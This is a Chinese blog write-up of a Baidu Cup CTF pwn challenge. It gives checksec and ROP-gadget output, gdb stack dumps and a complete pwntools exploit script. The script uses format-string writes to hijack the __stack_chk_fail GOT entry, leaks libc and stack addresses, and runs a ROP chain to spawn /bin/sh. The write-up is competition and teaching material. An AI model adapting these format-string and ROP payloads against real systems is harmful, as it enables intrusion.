ZoE

个人站

Pwn的挖坑填坑之旅


百度杯 pwn

百度杯 pwn

参考:https://www.anquanke.com/post/id/85785

what_the_fuck

root@kali:~/Desktop/ichunqiu# checksec what_the_fuck
[*] '/root/Desktop/ichunqiu/what_the_fuck'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

把name写进去的时候栈的情况如下图:

右图是把elf.got[‘__stack_chk_fail’](0x601020),写到栈上,后面改其got表的时候备用

没了%p,要想泄露地址,如何利用:

root@kali:~/Desktop/ichunqiu# ROPgadget --binary what_the_fuck --only "pop|ret"
Gadgets information
============================================================
0x0000000000400a7c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400a7e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400a80 : pop r14 ; pop r15 ; ret
0x0000000000400a82 : pop r15 ; ret
0x0000000000400a7b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400a7f : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004007c0 : pop rbp ; ret
0x0000000000400a83 : pop rdi ; ret
0x0000000000400a81 : pop rsi ; pop r15 ; ret
0x0000000000400a7d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400699 : ret

Unique gadgets found: 11
##########make up the stack#############

##########gadget1:0x400a60//bss:0x6010A0#####

p.recvuntil('input your name: ')
p.sendline('ZoE')
payload = p64(0)+p64(0x6010A0)+p64(0x400a60)
payload += 'A'*0x8
msg(payload)

#########read(0,.bss,0x3b)############

p.recvuntil('input your name: ')
p.sendline(p64(0x400a60))
payload = p64(0)+p64(1)+p64(elf.got['read'])+p64(0x3B)
msg(payload)

多次修改后的部分栈(前面因为修改地址而抬高的栈不显示出来)

0x7ffcb71cc500:	0x000000000a456f5a	0x00007f640e74ca00
0x7ffcb71cc510:	0x00007f640ea73520	0x7990da5d48aaee00
0x7ffcb71cc520:	0x00007ffcb71cc550	0x0000000000400981
0x7ffcb71cc530:	0x2439256332373225	0x41414141416e6868
0x7ffcb71cc540:	0x4141414141414141	0x00007ffcb71cc611
0x7ffcb71cc550:	0x00007ffcb71cc580	0x0000000000400a08
0x7ffcb71cc560:	0x000000000a456f5a	0x00007f640e74ca00
0x7ffcb71cc570:	0x00007f640ea73520	0x7990da5d48aaee00
0x7ffcb71cc580:	0x00007ffcb71cc5b0	0x0000000000400981
0x7ffcb71cc590:	0x2439256330363125	0x41414141416e6868
0x7ffcb71cc5a0:	0x4141414141414141	0x00007ffcb71cc610
0x7ffcb71cc5b0:	0x00007ffcb71cc5e0	0x0000000000400a08
0x7ffcb71cc5c0:	0x000000000a456f5a	0x00007f640e74ca00
0x7ffcb71cc5d0:	0x00007f640ea73520	0x7990da5d48aaee00
0x7ffcb71cc5e0:	0x00007ffcb71cc610	0x0000000000400a7a
0x7ffcb71cc5f0:	0x0000000000000000	0x0000000000000001
0x7ffcb71cc600:	0x0000000000601040	0x000000000000003b
0x7ffcb71cc610:	0x00000000006010a0	0x0000000000000000
0x7ffcb71cc620:	0x0000000000400a60	0x00007f640e74ca00
0x7ffcb71cc630:	0x0000000000000000	0x7990da5d48aaee00
0x7ffcb71cc640:	0x00000000006010a8	0x0000000000000000
0x7ffcb71cc650:	0x0000000000000000	0x00000000006010a0
0x7ffcb71cc660:	0x0000000000400a60	0x4141414141414141
0x7ffcb71cc670:	0x00007ffcb71cc6a0	0x0000000000400a08
0x7ffcb71cc680:	0x676e6978676e6978	0x00007f640e74ca00
0x7ffcb71cc690:	0x00007f640ea73520	0x7990da5d48aaee00
0x7ffcb71cc6a0:	0x00007ffcb71cc6d0	0x0000000000400981
0x7ffcb71cc6b0:	0x4141414141414141	0x646c243031254141
0x7ffcb71cc6c0:	0x4242424242424343	0x4242424242424242
0x7ffcb71cc6d0:	0x00007ffcb71cc700	0x0000000000400a08
0x7ffcb71cc6e0:	0x000000000a456f5a	0x0000000000000000
0x7ffcb71cc6f0:	0x0000000000000000	0x7990da5d48aaee00
0x7ffcb71cc700:	0x00007ffcb71cc730	0x0000000000400981
0x7ffcb71cc710:	0x3125633533343225	0x392541416e682432
0x7ffcb71cc720:	0x6161616161617324	0x0000000000601040
0x7ffcb71cc730:	0x00007ffcb71cc760	0x0000000000400a08
0x7ffcb71cc740:	0x0000000000601020	0x0000000000400700
0x7ffcb71cc750:	0x00007ffcb71cc840	0x7990da5d48aaee00
0x7ffcb71cc760:	0x0000000000400a20	0x00007f640e6fb2e1
[*] read_addr:0x7f640e7b66b0
[*] read_syscall:0x7f640e7b66be
[*] stack_addr:0x7ffcb71cc700
[*] modify 0x7ffcb71cc610 ==> 0x6010a0
[*] modify 0x7ffcb71cc618 ==> 0x0
[*] modify 0x7ffcb71cc630 ==> 0x0
[*] modify 0x7ffcb71cc5e8 ==> 0x400a7a
[*] modify 0x7ffcb71cc640 ==> 0x6010a8
[*] modify 0x7ffcb71cc648 ==> 0x0

法二

讲解参考:http://www.cnblogs.com/shangye/p/6209008.html 上面那个博客写的非常详细,我也是参考上面博客的步骤来做的。这里就不多说了

构造完之后的栈结构:

gdb-peda$ x /78xg $rsp
0x7fffc187ad70:	0x2564383835322e25	0x0000006e68243231
0x7fffc187ad80:	0x0000000000000000	0x0000000000000000
0x7fffc187ad90:	0x00007fffc187adc0	0x0000000000400a08
0x7fffc187ada0:	0x0000000000601020	0x00006e6824323100
0x7fffc187adb0:	0x00007fffc187b0b0	0xc9b4afa627fadf00
0x7fffc187adc0:	0x00007fffc187aeb8	0x0000000000400a1c
0x7fffc187add0:	0x00007fffc187adc0	0x00007f60eb488a00
0x7fffc187ade0:	0x00007f60eb7af520	0xc9b4afa627fadf00
0x7fffc187adf0:	0x00007fffc187ae20	0x0000000000400981
0x7fffc187ae00:	0x31342e256e243925	0x3125643036393639
0x7fffc187ae10:	0x00000000006e2432	0x00007fffc187aee4
0x7fffc187ae20:	0x00007fffc187ae50	0x0000000000400a08
0x7fffc187ae30:	0x00007fffc187aee8	0x00007f60eb488a00
0x7fffc187ae40:	0x00007f60eb7af520	0xc9b4afa627fadf00
0x7fffc187ae50:	0x00007fffc187ae80	0x0000000000400981
0x7fffc187ae60:	0x0000006e24323125	0x0000000000000000
0x7fffc187ae70:	0x0000000000000000	0x0000000000000000
0x7fffc187ae80:	0x00007fffc187aeb0	0x0000000000400a08
0x7fffc187ae90:	0x00007fffc187aee0	0x00007f60eb488a00
0x7fffc187aea0:	0x00007f60eb7af520	0xc9b4afa627fadf00
0x7fffc187aeb0:	0x00007fffc187aee0	0x0000000000400981
0x7fffc187aec0:	0x0000000000400a7c	0x0000000000601040
0x7fffc187aed0:	0x0000000000000200	0x00007fffc187aee8
0x7fffc187aee0:	0x0000000000000000	0x0000000000400a60
0x7fffc187aef0:	0x0000000000000000	0x00007f60eb488a00
0x7fffc187af00:	0x00007f60eb7af520	0xc9b4afa627fadf00
0x7fffc187af10:	0x00007fffc187af40	0x0000000000400981
0x7fffc187af20:	0x4141414141414141	0x646c243031254141
0x7fffc187af30:	0x4242424242424343	0x4242424242424242
0x7fffc187af40:	0x00007fffc187af70	0x0000000000400a08
0x7fffc187af50:	0x000000000a456f5a	0x0000000000000000
0x7fffc187af60:	0x0000000000000000	0xc9b4afa627fadf00
0x7fffc187af70:	0x00007fffc187afa0	0x0000000000400981
0x7fffc187af80:	0x3125633533343225	0x392541416e682432
0x7fffc187af90:	0x6161616161617324	0x0000000000601040
0x7fffc187afa0:	0x00007fffc187afd0	0x0000000000400a08
0x7fffc187afb0:	0x0000000000601020	0x0000000000400700
0x7fffc187afc0:	0x00007fffc187b0b0	0xc9b4afa627fadf00
0x7fffc187afd0:	0x0000000000400a20	0x00007f60eb4372e1

最后再:

payload=p64(0x0400A7A)
payload+=p64(0x0)
payload+=p64(0x1)
payload+=p64(0x601040)
payload+=p64(0x3b)
payload+=p64(0x601b00)
payload+=p64(0x0)
payload+=p64(0x400a60)
payload+=p64(0x0)
payload+=p64(0x0)
payload+=p64(0x1)
payload+=p64(0x601b08)
payload+=p64(0x0)
payload+=p64(0x0)
payload+=p64(0x601b00)
payload+=p64(0x400a60)

pause()
p.send(payload)

pause()
p.send('/bin/sh'+'\x00'+p64(syscall)+'\x00'*0x2b)

脚本:

# encoding: utf-8  
from pwn import *
import struct

elf = ELF('./what_the_fuck')

p = process('./what_the_fuck')
#p = remote('106.75.66.195',10000)

def msg(payload):
    p.recvuntil('leave a msg: ')
    #pause()
    p.send(payload)

###########1 _stack_chk_fail => main########

p.recvuntil('input your name: ')

p.sendline(p64(elf.got['__stack_chk_fail'])) #0x0000000000601020

#_stack_chk_fail => main
# main_addr = 0x400983
# 0x4006c6--> 0x400983

payload = "%"+str(0x983)+'c%12$hn'+'AA%9$s'
payload = payload.ljust(0x18,'a')
payload += p64(elf.got['read']) #read 's really addr
#trigger _stack_chk_fail to ROP 
msg(payload)
p.recvuntil('AA')
read = u64(p.recvuntil('\x7f').ljust(0x8,"\x00"))
log.info('read_addr:'+hex(read))

syscall = read+0xe
log.info('read_syscall:'+hex(syscall))
############2-->leak stack_addr###########
p.recvuntil('input your name: ')
p.sendline('ZoE')

payload = 'A'*10+'%10$ldCC'
payload = payload.ljust(0x20,'B')
msg(payload)
p.recvuntil('A'*10)
stack = int(p.recvuntil('CC',drop=True),10)
log.info('stack_addr:'+hex(stack))

##########change###############

payload=p64(0)
p.recvuntil('input your name: ')
p.send(payload)
p.recvuntil('leave a msg: ')
payload=p64(0x0400A7C)
payload+=p64(0x601040)
payload+=p64(0x200)
payload+=p64(stack-0x88)
pause()
p.send(payload)


payload=p64(stack-0x90)
p.recvuntil('input your name: ')
p.send(payload)
p.recvuntil('leave a msg: ')
payload='%12$n'
payload+='\x00'*(0x20-len(payload))
pause()
p.send(payload)


payload=p64(stack-0x88)
p.recvuntil('input your name: ')
p.send(payload)
p.recvuntil('leave a msg: ')
payload='%9$n'+'%.'+str(0x400a60)+'d'+'%12$n'
payload+='\x00'*(0x18-len(payload))
payload+=p64(stack-0x8c)
pause()
p.send(payload)


rbp=stack-0xb8
rbp=rbp%0x10000
payload=p64(stack-0x1b0)
p.recvuntil('input your name: ')
p.send(payload)
p.recvuntil('leave a msg: ')
payload='%.'+str(rbp)+'d'+'%12$hn'
pause()
p.send(payload)

###### change  from main return __stack_chk_fail ########

payload=p64(0x601020)
p.recvuntil('input your name: ')
p.send(payload)
p.recvuntil('leave a msg: ')
payload='%.'+str(0x0a1c)+'d'+'%12$hn'
payload+='\x00'*(0x20-len(payload))
c2=raw_input("go?")
pause()
p.send(payload)


payload=p64(0x0400A7A)
payload+=p64(0x0)
payload+=p64(0x1)
payload+=p64(0x601040)
payload+=p64(0x3b)
payload+=p64(0x601b00)
payload+=p64(0x0)
payload+=p64(0x400a60)
payload+=p64(0x0)
payload+=p64(0x0)
payload+=p64(0x1)
payload+=p64(0x601b08)
payload+=p64(0x0)
payload+=p64(0x0)
payload+=p64(0x601b00)
payload+=p64(0x400a60)
raw_input("go?")
pause()
p.send(payload)

pause()
p.send('/bin/sh'+'\x00'+p64(syscall)+'\x00'*0x2b)


p.interactive()

借图:

打赏一个呗

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦